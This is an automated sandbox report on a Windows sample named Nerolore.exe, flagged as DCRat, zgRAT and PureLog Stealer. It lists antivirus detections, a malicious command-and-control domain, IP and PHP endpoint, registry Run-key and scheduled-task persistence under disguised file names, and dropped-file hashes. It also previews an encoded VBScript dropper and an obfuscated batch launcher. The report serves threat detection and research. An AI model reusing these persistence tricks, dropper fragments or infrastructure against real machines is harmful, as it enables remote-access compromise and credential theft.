                              C:\Users\user\Desktop\vBGRGbPj.log | 100% | Joe Sandbox ML | |
                              C:\FontHost\NjWYKcLujkVoPzemFBeg.exe | 100% | Joe Sandbox ML | |
                              C:\Users\user\Desktop\ddCMyFqs.log | 100% | Joe Sandbox ML | |
                              C:\FontHost\ContainerAgentWinSession.exe | 100% | Joe Sandbox ML | |
                              C:\FontHost\ContainerAgentWinSession.exe | 66% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
                              C:\FontHost\ContainerAgentWinSession.exe | 55% | Virustotal | | Browse
                              C:\FontHost\NjWYKcLujkVoPzemFBeg.exe | 66% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
                              C:\FontHost\NjWYKcLujkVoPzemFBeg.exe | 55% | Virustotal | | Browse
                              C:\Program Files\7-Zip\Lang\NjWYKcLujkVoPzemFBeg.exe | 66% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
                              C:\Program Files\7-Zip\Lang\NjWYKcLujkVoPzemFBeg.exe | 55% | Virustotal | | Browse
                              C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exe | 66% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
                              C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exe | 55% | Virustotal | | Browse
                              C:\ProgramData\dbg\conhost.exe | 66% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
                              C:\ProgramData\dbg\conhost.exe | 55% | Virustotal | | Browse
                              C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates\OfficeClickToRun.exe | 66% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
                              C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates\OfficeClickToRun.exe | 55% | Virustotal | | Browse
                              C:\Users\user\Desktop\EeOHqUfQ.log | 29% | ReversingLabs | ByteCode-MSIL.Trojan.Generic |
                              C:\Users\user\Desktop\EeOHqUfQ.log | 27% | Virustotal | | Browse
                              C:\Users\user\Desktop\EmyZUDGW.log | 25% | ReversingLabs | |
                              C:\Users\user\Desktop\EmyZUDGW.log | 29% | Virustotal | | Browse
                              C:\Users\user\Desktop\GeIICmFp.log | 71% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
                              C:\Users\user\Desktop\GeIICmFp.log | 69% | Virustotal | | Browse
                              C:\Users\user\Desktop\LtUgLbtj.log | 25% | ReversingLabs | |
                              C:\Users\user\Desktop\LtUgLbtj.log | 29% | Virustotal | | Browse
                              C:\Users\user\Desktop\ONhXawky.log | 17% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
                              C:\Users\user\Desktop\ONhXawky.log | 22% | Virustotal | | Browse
                              C:\Users\user\Desktop\XwBnJZqg.log | 71% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
                              C:\Users\user\Desktop\XwBnJZqg.log | 69% | Virustotal | | Browse
                              C:\Users\user\Desktop\ddCMyFqs.log | 8% | ReversingLabs | |
                              C:\Users\user\Desktop\ddCMyFqs.log | 11% | Virustotal | | Browse
                              C:\Users\user\Desktop\goYNyXVt.log | 29% | ReversingLabs | ByteCode-MSIL.Trojan.Generic |
                              C:\Users\user\Desktop\goYNyXVt.log | 27% | Virustotal | | Browse
                              C:\Users\user\Desktop\vBGRGbPj.log | 8% | ReversingLabs | |
                              C:\Users\user\Desktop\vBGRGbPj.log | 11% | Virustotal | | Browse
                              C:\Users\user\Desktop\xvosSKAI.log | 17% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
                              No Antivirus matches
                              Source | Detection | Scanner | Label | Link
                              373292cm.nyashka.top | 19% | Virustotal | | Browse
                              15.164.165.52.in-addr.arpa | 0% | Virustotal | | Browse
                              Source | Detection | Scanner | Label | Link
                              https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe |
                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe |
                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe |
                              https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe |
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe |
                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe |
                              https://www.google.com/images/branding/product/ico/googleg_lodp.ico | 0% | Avira URL Cloud | safe |
                              https://duckduckgo.com/ac/?q= | 0% | Virustotal | | Browse
                              https://duckduckgo.com/ac/?q= | 0% | Avira URL Cloud | safe |
                              http://www.enigmaprotector.com/openU | 0% | Virustotal | | Browse
                              https://duckduckgo.com/chrome_newtab | 0% | Avira URL Cloud | safe |
                              http://373292cm.nyashka.top | 100% | Avira URL Cloud | malware |
                              http://www.enigmaprotector.com/openU | 0% | Avira URL Cloud | safe |
                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | Avira URL Cloud | safe |
                              http://373292cm.nyashka.top/ | 100% | Avira URL Cloud | malware |
                              http://www.enigmaprotector.com/ | 0% | Avira URL Cloud | safe |
                              http://373292cm.nyashka.top/JavascriptSecureSqlLocalTemporary.php | 100% | Avira URL Cloud | malware |
                              https://www.google.com/images/branding/product/ico/googleg_lodp.ico | 0% | Virustotal | | Browse
                              http://373292cm.nyPr8 | 0% | Avira URL Cloud | safe |
                              http://373292cm.nyashka.top/ | 19% | Virustotal | | Browse
                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | Virustotal | | Browse
                              http://373292cm.nyashka.top | 19% | Virustotal | | Browse
                              http://www.enigmaprotector.com/ | 0% | Virustotal | | Browse
                              http://373292cm.nyashka.top/JavascriptSecureSqlLocalTemporary.php | 18% | Virustotal | | Browse
                              https://duckduckgo.com/chrome_newtab | 0% | Virustotal | | Browse
Name | IP | Active | Malicious | Antivirus Detection | Reputation
373292cm.nyashka.top | 80.211.144.156 | true | true | | unknown
15.164.165.52.in-addr.arpa | unknown | unknown | false | | unknown

Name | Malicious | Antivirus Detection | Reputation
http://373292cm.nyashka.top/JavascriptSecureSqlLocalTemporary.php | true | 18%, Virustotal, Browse; Avira URL Cloud: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://ac.ecosia.org/autocomplete?q= | NjWYKcLujkVoPzemFBeg.exe, 0000001D.00000002.3371511571.000000001295D000.00000004.00000800.00020000.00000000.sdmp, g1xwJn77k7.29.dr, 1JeEX4hzC8.29.dr | false | URL Reputation: safe | unknown
https://duckduckgo.com/chrome_newtab | NjWYKcLujkVoPzemFBeg.exe, 0000001D.00000002.3371511571.000000001295D000.00000004.00000800.00020000.00000000.sdmp, g1xwJn77k7.29.dr, 1JeEX4hzC8.29.dr | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://duckduckgo.com/ac/?q= | NjWYKcLujkVoPzemFBeg.exe, 0000001D.00000002.3371511571.000000001295D000.00000004.00000800.00020000.00000000.sdmp, g1xwJn77k7.29.dr, 1JeEX4hzC8.29.dr | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | NjWYKcLujkVoPzemFBeg.exe, 0000001D.00000002.3371511571.000000001295D000.00000004.00000800.00020000.00000000.sdmp, g1xwJn77k7.29.dr, 1JeEX4hzC8.29.dr | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://373292cm.nyashka.top | NjWYKcLujkVoPzemFBeg.exe, 0000001D.00000002.3350660394.0000000002AF7000.00000004.00000800.00020000.00000000.sdmp, NjWYKcLujkVoPzemFBeg.exe, 0000001D.00000002.3350660394.00000000028C4000.00000004.00000800.00020000.00000000.sdmp | true | 19%, Virustotal, Browse; Avira URL Cloud: malware | unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | NjWYKcLujkVoPzemFBeg.exe, 0000001D.00000002.3371511571.000000001295D000.00000004.00000800.00020000.00000000.sdmp, g1xwJn77k7.29.dr, 1JeEX4hzC8.29.dr | false | URL Reputation: safe | unknown
http://www.enigmaprotector.com/openU | Nerolore.exe, 00000000.00000002.2093218096.0000000000FF2000.00000040.00000001.01000000.00000003.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | NjWYKcLujkVoPzemFBeg.exe, 0000001D.00000002.3371511571.000000001295D000.00000004.00000800.00020000.00000000.sdmp, g1xwJn77k7.29.dr, 1JeEX4hzC8.29.dr | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://373292cm.nyashka.top/ | NjWYKcLujkVoPzemFBeg.exe, 0000001D.00000002.3350660394.00000000027D1000.00000004.00000800.00020000.00000000.sdmp | true | 19%, Virustotal, Browse; Avira URL Cloud: malware | unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | NjWYKcLujkVoPzemFBeg.exe, 0000001D.00000002.3371511571.000000001295D000.00000004.00000800.00020000.00000000.sdmp, g1xwJn77k7.29.dr, 1JeEX4hzC8.29.dr | false | URL Reputation: safe | unknown
http://www.enigmaprotector.com/ | Nerolore.exe, 00000000.00000002.2093218096.0000000000FF2000.00000040.00000001.01000000.00000003.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://www.ecosia.org/newtab/ | NjWYKcLujkVoPzemFBeg.exe, 0000001D.00000002.3371511571.000000001295D000.00000004.00000800.00020000.00000000.sdmp, g1xwJn77k7.29.dr, 1JeEX4hzC8.29.dr | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | ContainerAgentWinSession.exe, 00000005.00000002.2279169937.0000000003642000.00000004.00000800.00020000.00000000.sdmp, NjWYKcLujkVoPzemFBeg.exe, 0000001D.00000002.3350660394.00000000027D1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | NjWYKcLujkVoPzemFBeg.exe, 0000001D.00000002.3371511571.000000001295D000.00000004.00000800.00020000.00000000.sdmp, g1xwJn77k7.29.dr, 1JeEX4hzC8.29.dr | false | URL Reputation: safe | unknown
http://373292cm.nyPr8 | NjWYKcLujkVoPzemFBeg.exe, 0000001D.00000002.3350660394.0000000002AF7000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
80.211.144.156 | 373292cm.nyashka.top | Italy | | 31034 | ARUBA-ASNIT | true
                              Joe Sandbox version:40.0.0 Tourmaline
                              Analysis ID:1498674
                              Start date and time:2024-08-25 15:42:05 +02:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 9m 14s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:46
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:Nerolore.exe
                              Detection:MAL
                              Classification:mal100.spre.troj.spyw.expl.evad.winEXE@52/56@3/1
                              EGA Information:
                              • Successful, ratio: 20%
                              HCA Information:Failed
                              Cookbook Comments:
                              • Found application associated with file extension: .exe
                              • Exclude process from analysis (whitelisted): dllhost.exe, OfficeClickToRun.exe, SIHClient.exe, svchost.exe
                              • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                              • Execution Graph export aborted for target ContainerAgentWinSession.exe, PID 7200 because it is empty
                              • Execution Graph export aborted for target ContainerAgentWinSession.exe, PID 7208 because it is empty
                              • Execution Graph export aborted for target NjWYKcLujkVoPzemFBeg.exe, PID 5664 because it is empty
                              • Execution Graph export aborted for target NjWYKcLujkVoPzemFBeg.exe, PID 6968 because it is empty
                              • Execution Graph export aborted for target NjWYKcLujkVoPzemFBeg.exe, PID 7380 because it is empty
                              • Execution Graph export aborted for target conhost.exe, PID 5424 because it is empty
                              • Execution Graph export aborted for target conhost.exe, PID 5632 because it is empty
                              • Execution Graph export aborted for target conhost.exe, PID 7260 because it is empty
                              • Not all processes where analyzed, report is missing behavior information
                              • Report size exceeded maximum capacity and may have missing behavior information.
                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                              • Report size getting too big, too many NtDeviceIoControlFile calls found.
                              • Report size getting too big, too many NtOpenFile calls found.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
09:43:28 | API Interceptor | 214830x Sleep call for process: NjWYKcLujkVoPzemFBeg.exe modified
15:43:18 | Task Scheduler | Run new task: conhost path: "C:\Users\All Users\dbg\conhost.exe"
15:43:18 | Task Scheduler | Run new task: conhostc path: "C:\Users\All Users\dbg\conhost.exe"
15:43:18 | Task Scheduler | Run new task: NjWYKcLujkVoPzemFBeg path: "C:\FontHost\NjWYKcLujkVoPzemFBeg.exe"
15:43:18 | Task Scheduler | Run new task: NjWYKcLujkVoPzemFBegN path: "C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exe"
15:43:18 | Task Scheduler | Run new task: OfficeClickToRun path: "C:\Users\Default\Templates\OfficeClickToRun.exe"
15:43:18 | Task Scheduler | Run new task: OfficeClickToRunO path: "C:\Users\Default\Templates\OfficeClickToRun.exe"
15:43:19 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run NjWYKcLujkVoPzemFBeg "C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exe"
15:43:21 | Task Scheduler | Run new task: ContainerAgentWinSession path: "C:\FontHost\ContainerAgentWinSession.exe"
15:43:21 | Task Scheduler | Run new task: ContainerAgentWinSessionC path: "C:\FontHost\ContainerAgentWinSession.exe"
15:43:27 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run conhost "C:\Users\All Users\dbg\conhost.exe"
15:43:35 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run OfficeClickToRun "C:\Users\Default\Templates\OfficeClickToRun.exe"
15:43:43 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run ContainerAgentWinSession "C:\FontHost\ContainerAgentWinSession.exe"
15:43:51 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run NjWYKcLujkVoPzemFBeg "C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exe"
15:44:00 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run conhost "C:\Users\All Users\dbg\conhost.exe"
15:44:08 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run OfficeClickToRun "C:\Users\Default\Templates\OfficeClickToRun.exe"
15:44:16 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run ContainerAgentWinSession "C:\FontHost\ContainerAgentWinSession.exe"
15:44:25 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run NjWYKcLujkVoPzemFBeg "C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exe"
15:44:33 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run conhost "C:\Users\All Users\dbg\conhost.exe"
15:44:41 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run OfficeClickToRun "C:\Users\Default\Templates\OfficeClickToRun.exe"
15:44:49 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run ContainerAgentWinSession "C:\FontHost\ContainerAgentWinSession.exe"
15:45:05 | Autostart | Run: WinLogon Shell "C:\Program Files\7-Zip\Lang\NjWYKcLujkVoPzemFBeg.exe"
15:45:13 | Autostart | Run: WinLogon Shell "C:\FontHost\NjWYKcLujkVoPzemFBeg.exe"
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
80.211.144.156 | SpotifyStartupTask.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | 973800cm.nyashsens.top/SecureBigloadServerDefaulttestdlepublic.php
80.211.144.156 | SpotifyStartupTask2.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | 572335cm.n9sh.top/CpuserverAsyncuniversal.php
80.211.144.156 | BxV2vsnP6f.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | fizika.top/vmphp_geoUpdateProtectBasecdn.php
80.211.144.156 | loader.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | 782652cm.n9sh.top/providerImageProcessorGeneratorwp.php
80.211.144.156 | MIDNIGHT.exe | Get hash | malicious | DCRat, PureLog Stealer, XWorm, zgRAT | Browse | 782652cm.n9sh.top/providerImageProcessorGeneratorwp.php
80.211.144.156 | b5d8kjYEBH.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | 951499cm.nyashtech.top/sqlcentralUploads.php
80.211.144.156 | cBEWDhqv1r.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | 389075cm.n9sh.top/tolowProcessserverwindowsFlowertesttrackWpUploads.php
80.211.144.156 | A6CuqcjdpG.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | 951499cm.nyashtech.top/sqlcentralUploads.php
80.211.144.156 | 79khRJMBK9.exe | Get hash | malicious | DCRat | Browse | volki.top/CpuLongpolltrackDatalifeCdnuploads.php
80.211.144.156 | EQ1VCbEIkT.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | 951499cm.nyashtech.top/sqlcentralUploads.php

Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
373292cm.nyashka.top | jW5TA1J9Z1.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | 80.211.144.156

Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
ARUBA-ASNIT | SpotifyStartupTask.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | 80.211.144.156
ARUBA-ASNIT | SpotifyStartupTask2.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | 80.211.144.156
ARUBA-ASNIT | BxV2vsnP6f.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | 80.211.144.156
ARUBA-ASNIT | loader.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | 80.211.144.156
ARUBA-ASNIT | MIDNIGHT.exe | Get hash | malicious | DCRat, PureLog Stealer, XWorm, zgRAT | Browse | 80.211.144.156
ARUBA-ASNIT | b5d8kjYEBH.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | 80.211.144.156
ARUBA-ASNIT | cBEWDhqv1r.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | 80.211.144.156
ARUBA-ASNIT | A6CuqcjdpG.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | 80.211.144.156
ARUBA-ASNIT | 79khRJMBK9.exe | Get hash | malicious | DCRat | Browse | 80.211.144.156
ARUBA-ASNIT | EQ1VCbEIkT.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | 80.211.144.156
                              Process:C:\FontHost\ContainerAgentWinSession.exe
                              File Type:ASCII text, with very long lines (682), with no line terminators
                              Category:dropped
                              Size (bytes):682
                              Entropy (8bit):5.884418242643272
                              Encrypted:false
                              SSDEEP:12:P8CWavAilZBJ9McPtx+frppwK3DoMThR1OgNaox6WBVn+ziyVsqAM:P8C9jBJ9MwCx3DoMThR1OgrkAZyVaM
                              MD5:F89357C623B432B41B879DB7EDC6CE66
                              SHA1:983F2C8BF1EB0B8A3C459F518EC03BC3B6DE820B
                              SHA-256:A13FD56225F8982E943378D3810FCE8C4150432966635A016430F0D00740C06B
                              SHA-512:BD7D38ECCC025598F9C8227912D483BD011F711360FD52C7BCF10FE8AAEA81B7F3F0A863DFEF7240D65FFD9355C37BC10AC86D72F2904E3DC831A40CFBBF2545
                              Malicious:false
                              Process:C:\FontHost\ContainerAgentWinSession.exe
                              File Type:ASCII text, with very long lines (332), with no line terminators
                              Category:dropped
                              Size (bytes):332
                              Entropy (8bit):5.8335759852953055
                              Encrypted:false
                              SSDEEP:6:ONpApthSfF9yTn4StUV3QXw1APIwRacELTzrx08ZIftzpE8dicISqU8fvI:wpAJoF9yEStUV3ofxRaljZyVdicbv9
                              MD5:6380CB1F24A7D1FD02B9F6987C3EB779
                              SHA1:4A653C30F23D5087CD481F85358DC7D29149C31A
                              SHA-256:FA1DE9ABD89D952CC8CC84074CF593AA1FF340A852BE8C3314D2B495D9257095
                              SHA-512:2ABAB82B49BA10FEA484D54BF374E680C33CB49A5AEB8351AC84DB80605FA13CEEFFDA27D2F5AFD331A94BDD7BAF74B736E1D7FF6BD1030E8CAF33DA39921C06
                              Malicious:false
                              Process:C:\Users\user\Desktop\Nerolore.exe
                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:dropped
                              Size (bytes):1957888
                              Entropy (8bit):7.548545725494237
                              Encrypted:false
                              SSDEEP:24576:UaseMBOPMCPt3ZBngCi5OgpgPz3oOOMeqf3ocj7U45KQkBHiCXuKt7xiGRV:qNod2OgiPz3qMebcU4Et7MG
                              MD5:03EF05FF3B0C058220324C2CE72950F2
                              SHA1:1D82C1A36AD54002E93AB1665308343E8FBB3041
                              SHA-256:9D4430A9841B632DDFE2E41E4BA828A860194BC7A2B2F494655C2DB9841056C1
                              SHA-512:23C96AE50B2DA42FAB79D8BD0ABABC820E84A4A5C46473E916425C39AC4BB24FAEAF49FFC6D37B26D4E8B5E9BAB15D9951E6B1DCE12CBDF1C904930CA1B69772
                              Malicious:true
                              Yara Hits:
                              • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\FontHost\ContainerAgentWinSession.exe, Author: Joe Security
                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\FontHost\ContainerAgentWinSession.exe, Author: Joe Security
                              Antivirus:
                              • Antivirus: Avira, Detection: 100%
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              • Antivirus: ReversingLabs, Detection: 66%
                              • Antivirus: Virustotal, Detection: 55%, Browse
                              Process:C:\FontHost\ContainerAgentWinSession.exe
                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:dropped
                              Size (bytes):1957888
                              Entropy (8bit):7.548545725494237
                              Encrypted:false
                              SSDEEP:24576:UaseMBOPMCPt3ZBngCi5OgpgPz3oOOMeqf3ocj7U45KQkBHiCXuKt7xiGRV:qNod2OgiPz3qMebcU4Et7MG
                              MD5:03EF05FF3B0C058220324C2CE72950F2
                              SHA1:1D82C1A36AD54002E93AB1665308343E8FBB3041
                              SHA-256:9D4430A9841B632DDFE2E41E4BA828A860194BC7A2B2F494655C2DB9841056C1
                              SHA-512:23C96AE50B2DA42FAB79D8BD0ABABC820E84A4A5C46473E916425C39AC4BB24FAEAF49FFC6D37B26D4E8B5E9BAB15D9951E6B1DCE12CBDF1C904930CA1B69772
                              Malicious:true
                              Yara Hits:
                              • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe, Author: Joe Security
                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe, Author: Joe Security
                              Antivirus:
                              • Antivirus: Avira, Detection: 100%
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              • Antivirus: ReversingLabs, Detection: 66%
                              • Antivirus: Virustotal, Detection: 55%, Browse
                              Process:C:\Users\user\Desktop\Nerolore.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):224
                              Entropy (8bit):5.867997713932616
                              Encrypted:false
                              SSDEEP:6:GPwqK+NkLzWbHw/JUrFnBaORbM5nC+ZpQPOqvRBPkYYY:GWMCzWLVhBaORbQC+WdpB5YY
                              MD5:47BFCD5994928ECCF94E80946AF68B10
                              SHA1:00A6C369333643B1084C1D6FE7A7A5239E7C8B8C
                              SHA-256:E1A8B0DDDE7C4DEBCAF4F943488399E2AC509C5FB863F96C9CFFE06A99A0EE2C
                              SHA-512:C99326CEEC83FD46CEB46E810618E5F5DAB197B069A53654C17377DAF8F67E1FDD3EA4ECDB5B9743CB6391691A6184B7EB7B6C02C29E400A1166284AB0FDDC77
                              Malicious:true
                              Antivirus:
                              • Antivirus: Avira, Detection: 100%
                              Preview:#@~^xwAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2vFf!ZT*@#@&U+DP.ktU4+^V~',Z.nmY+}8L.mYvE.?1DbwORj4.VsJ*@#@&q/4j4+Vs "EUPr/=zoKxDCWkYJ&LmA.2Go*slSj2.NSW!Io*Nos_?LVU^81\H:;bc4COr~PTS,0CVknaj4AAA==^#~@.
                              Process:C:\Users\user\Desktop\Nerolore.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):89
                              Entropy (8bit):5.04427174089609
                              Encrypted:false
                              SSDEEP:3:s1+RXQClxhAKqHKlRAXLuRytQ0dAHAvKiIyx:skXQCrMHKl1RyG0pvKhyx
                              MD5:78D0BAFBE771F59292A1DCD87F530745
                              SHA1:936326E650C1437B9D0E7E8EB846AEFA80211546
                              SHA-256:2924E7292BDC8B22CA3F24180817C2B0314D4B9F6A7A7900B42A74B8185A0899
                              SHA-512:B1B189CBE2AEB063F2FAA3E6508859792F4ECCD64E4887A0728AAC1C6B31B56DF7C24A53E1354B4F5B3625D1A39796AC940D7556EDAD1240826A503EF9C3C0C1
                              Malicious:false
                              Preview:%lPjNghBINidpd%%nTthv%..%BfgukdTxZQC%"C:\FontHost/ContainerAgentWinSession.exe"%JoGqtgTy%
                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                              File Type:MSVC .res
                              Category:dropped
                              Size (bytes):1168
                              Entropy (8bit):4.448520842480604
                              Encrypted:false
                              SSDEEP:24:mZxT0uZhNB+h9PNnqNdt4+lEbNFjMyi07:yuulB+hnqTSfbNtme
                              MD5:B5189FB271BE514BEC128E0D0809C04E
                              SHA1:5DD625D27ED30FCA234EC097AD66F6C13A7EDCBE
                              SHA-256:E1984BA1E3FF8B071F7A320A6F1F18E1D5F4F337D31DC30D5BDFB021DF39060F
                              SHA-512:F0FCB8F97279579BEB59F58EA89527EE0D86A64C9DE28300F14460BEC6C32DDA72F0E6466573B6654A1E992421D6FE81AE7CCE50F27059F54CF9FDCA6953602E
                              Malicious:false
                              Preview:.... ...........................D...<...............0...........D.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...8.....I.n.t.e.r.n.a.l.N.a.m.e...m.s.e.d.g.e...e.x.e.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...@.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...m.s.e.d.g.e...e.x.e.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <security>.. <requestedPrivileges xmlns="urn:schemas-micro
                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:dropped
                              Size (bytes):4608
                              Entropy (8bit):3.926258037088774
                              Encrypted:false
                              SSDEEP:48:6omNtWxZ8RxeOAkFJOcV4MKe28dod4u80vqBHnuulB+hnqXSfbNtm:OpxvxVx9L0vkZTkZzNt
                              MD5:628CB6CEBB6DE194ABCAE0F7E7C53FCB
                              SHA1:35BB9497C573CF3E90CBF05F67C34209EBE740AD
                              SHA-256:04F8A2CB2C4363F9F62A6DBB082CD57111302A1BFFB8FDBDEE3254C6F1AB42F1
                              SHA-512:3BD8C876F2A8EEB11B18FA863D7A7C0E7C54EB2B40E3E95AD2A6694C886D2A00A62BE595C1CCDE9915F90FCDC468888525FC3465B218512B71890AA642A6E465
                              Malicious:true
                              Antivirus:
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              Process:C:\FontHost\ContainerAgentWinSession.exe
                              File Type:ASCII text, with very long lines (364), with no line terminators
                              Category:dropped
                              Size (bytes):364
                              Entropy (8bit):5.797295390114544
                              Encrypted:false
